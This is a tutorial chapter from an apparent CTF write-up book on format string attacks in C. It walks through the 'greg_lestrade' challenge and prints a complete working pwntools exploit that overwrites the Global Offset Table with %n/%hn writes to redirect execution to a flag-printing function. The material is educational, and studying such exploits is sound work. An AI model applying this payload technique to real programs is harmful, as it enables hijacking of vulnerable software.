Format String Attack

The first topic I chose for this book is format string attack or format string exploit, where we can exploit a format string bug in a C program to read from or write to memory and also execute arbitrary code. To put it simply, we can run our own command by injecting it into a format string that will be translated by the machine as a legitimate instruction.

What is it?

A format function (not a format string), is a conversion function in C which takes a number of argument in which format string is one of them. The function mainly converts primitive C data-type into human readable string, and reads additional arguments from format strings in doing so. Our exploit will revolve around creating specifically crafted format strings and inserting them into a printf function (or its family, like fprintf, vprintf, etc.).

How does it work?

The exploit allows us to write arbitrary values into arbitrary address (write what where) in the memory. This means we can write a shellcode into some random address and control the execution flow so the program executes our handcrafted shellcode. The format function takes a number of arguments, something like this:

printf ("%d", 1337);

The printf is the format function, the %d is the format parameter, and the 1337 is the parameter in which will be converted into a decimal and printed out into output. The key is that the format function always process the data before sending it into output.

To put it simply, we manipulate the function into running our command instead of its original command. That's what it means to "gain control of the execution flow".

That is the Holy Grail of all binary exploitation challenge.

And we're gonna do just that.

What can we do with it?

Our ultimate goal in every binary exploitation is to gain control of the execution flow. It means to control the Instruction Pointer (EIP, RIP, or just IP). Since format string attacks allow us to read and write arbitrary values into arbitrary address (or vice versa), they give us just the right opportunity to do just that. Note that we can dump memory data both partially and sometimes even completely by peeking at the stack. It happens when we use a format parameter that passes a reference such as %s.

Here's a handy table from a great source:

parameter output passed as
%d decimal (int) value
%u unsigned decimal (unsigned int) value
%x hexadecimal (unsigned int) value
%s string ((const) (unsigned) char *) reference
%n number of bytes written so far, (* int) reference

Write-up Analysis

In every chapter of this collection I will always add a write-up after basic explanation (hence the name of this book). I featured a not so basic format string attack example which can be a good exercise for us.

Original write-up: https://binarystud.io/asisctf-2017-greg-lestrade-exploitation.html

Original challenge: https://drive.google.com/file/d/0ByyTnvUEO5_BemZ5T0pGd0doT2s/view?usp=sharing

Here we go

The file is in a compressed format so we have to extract it first before we wreck havoc inside. Use the command

tar -xvf [filename]

to extract it.

Then we change the permission so we can execute the file with

chmod +x [filename] or chmod 770 [filename].

We can check what the file really is with the file command.

[TODO]

We can see that it is indeed an ELF 64-bit. Now we can try to run it.

[TODO]

The program asked for an input. Well, the original write-up guy tried things like adding format string specifier inside the input to see what's going to happen. The program crashed, meaning the form string vulnerability is present in the program.

Well, the first thing that pops up to my mind whenever I see any binary exploitation program is to bring it up into the surgery table. My favorite tool for static analysis at the moment is IDA Pro. It's really good and it also has a feature to disassemble your assembly code into pseudocode, but for educational purpose I'll try to keep them in assembly.

[TODO]

As we can see from the previous picture, the program is indeed stripped but somehow it still retains its main function. And we'll see just that.

Of course we know from running the program earlier that it tries to ask for an admin password. Seeing the main function disassembly we can see that the program used the read function to take our input from file descriptor (in this case, the file descriptor is 0 for stdin) and compare it to some variable. Although we can easily search the string from the original write-up, my intuition for this kind of case is to check the global variable section, the rodata.

Or just use strings in linux :)

[TODO]

Let's put it in.

[TODO]

Nice, we enter just fine! But the program got an alarm clock that will exit after a certain period of time (I'm too lazy to search for the exact number).

One of the downside of using CLI instead of GUI on Linux is that you can't copy paste a string from terminal. The solution is grep the damn string and put it inside a file for a temporary use. Hell, anything can work in Linux. I forgot how to redirect the output into the input so that will have to wait for another time.

Now that we have the first entrance, we must bypass another gate so the program will invoke the /bin/cat flag.txt

[TODO]

Since this is just a write-up analysis and not a real life CTF scenario, I won't spend much time understanding the code because the guy already did that for us. So I'm focusing on the "how did it work" instead of "let's do it again".

To put it simply, we will have to gain control of RIP so we can point to this uncalled function. Note that this function didn't appear on the left panel because it wasn't called when the program runs.

So how do we do that?

I would love to say magic again but my friend might cross my name from the team so...

Since the stack is protected, we wouldn't be able to use buffer overflow attack to smash the stack so it will execute our desired function. Instead, we will overwrite the GOT or Global Offset Table which contains the absolute location of a dynamically linked function. I will talk about GOT in some other chapter because even though it's important, the most important thing for me to do right now is to finish this chapter before the deadline (12 hours seems so fast when you got something to submit). To make it easier, the GOT is a place in memory where the addresses of functions are loaded when you run the program. So we're going to hijack that table and make it point to our flag printing function. Simple isn't it?

The original write-up guy is really good. He taught the basics a lot to me with just his writings. The first thing we should do when we encounter a stack canary or any other stack protection is checking the permission of the GOT. Let's do it his way:

[TODO]

Fire up radare2 and open our program with it:

r2 ./greg_lestrade.

The iS~got command means we're inspecting the sections of the program and grep our GOT from the result.

Okay we can write into it alright. See the beautiful rw written after perm.

Let's just get into it. We already see our desired address with IDA Pro earlier, 0x400876. This will print the flag for us.

Oh right, just to test if we succeed or not, let's make a file called flag and fill it with some random words and see if our payload can print that flag for us (since we're going to call the /bin/cat flag).

#!/usr/bin/env python2
from pwn import *

DEBUG = True

if DEBUG:
    p = process ("./greg_lestrade")
else:
    p = remote ("") #Since the web is down I don't feel the need to enter it

def main ():
    text = "7h15_15_v3ry_53cr37_1_7h1nk"

    if DEBUG:
        print ("Debug mode, [enter] to continue")
        raw_input ()

    for i in range (3):
        print (p.readline ())

    p.sendline (text)

    for i in range (2):
        print (p.readline ())

    p.sendline ("1")

    p.readline ()

    clearGOT = "%72$n"
    writeBack = "%65123lx.%72$hn"
    writeTo1 = p64 (0x602042)
    writeFront = "%2101lx.%73$hn"
    writeTo2 = p64 (0x602040)

    payload = 'a' * (0x1fe - len (clearGOT + writeBack + writeFront)) + clearGOT + writeBack + writeFront + '\x0a\x00' + writeTo1 + writeTo2

    print (payload)

    p.sendline (payload)

    p.sendline ("1")

    p.readline ()

    for i in range (3):
        p.readline ()

    print (p.readline ())

    p.close ()

if __name__ == "__main__":
    main ()

To better understand the python script, I'm going to explain what every line does.

The first line, called the "shebang" (I don't know why, maybe it involves a "she" and a good ol' "banging") means that our script will be interpreted with python2 located on /usr/bin/env.

On the second line, we imported everything from the pwnlibrary. Almost every binary challenge on this book will be using this library as its main weapon, so you might want to learn more about it.

Next, we set the DEBUG flag as true. This means we can attach the script into a program in debug mode.

Now since we already set the DEBUG flag earlier, the if statement will always be true. The p = process (./greg_lestrade) says that we're attaching our script into the challenge. If the challenge is still up on its original server, I would like to use the p = remote () function. It just means that we're attaching our script into a remote process.

Next is our main function. I'm going to skip all the basic things for now and get into the functions from pwn library.

In the main function, we put our "admin password" string into a variable so we can use it later. Just as the p = process above, our debug remains true, and so it will print our statement. The raw _input () is just a function to ask user to input anything to continue.

Next we create a loop to read three lines from the process (which is our greg_lestrade challenge).

And then we send our admin password to the process.

Then we read the output just like before.

After that we send '1' as our input to the process, and read it just like before.

Here the magic began.

The variables written there will be used on the payload. Now let's break it down:

  • clearGOT means we will clear the lower half of the Global Offset Table for our payload. The %72$n means we will refer to the 72nd word on the stack as an argument for this variable.
  • writeBack and writeFront are simply the address of our hidden function (/bin/cat flag.txt) split into two. We do this because the endianness of the program (if you don't understand what that means, I suggest you to learn the basics first). The huge numbers behind the lx (long hexadecimal) means that we will print whitespaces as much as that number before appending the spaces with our address which will be converted into a long hexadecimal and written as a half word (hn). Again, if you don't know what a 'word' is in binary, please read the basics before you stray further into this abyss.
  • writeTo1 and writeTo2 are the address of the GOT we're trying to write into. the p64 () means that we will pack that number as a 64-bit address.
  • next is the payload. This is the core weapon of this exploit. The 0x0a and 0x00 will be read as newline character and null terminator respectively (since the original write-up guy is exploiting the read () function ).
  • after that, we print the payload so we can check our weapon. This is optional.
  • the next lines are just printing and reading lines.

There you go.

Well, since this is my first time writing this kind of thing, I will feel bad if there are some things that doesn't look clear to you. For critics and suggestion, you can hit me up on my email: [email protected]

results matching ""

    No results matching ""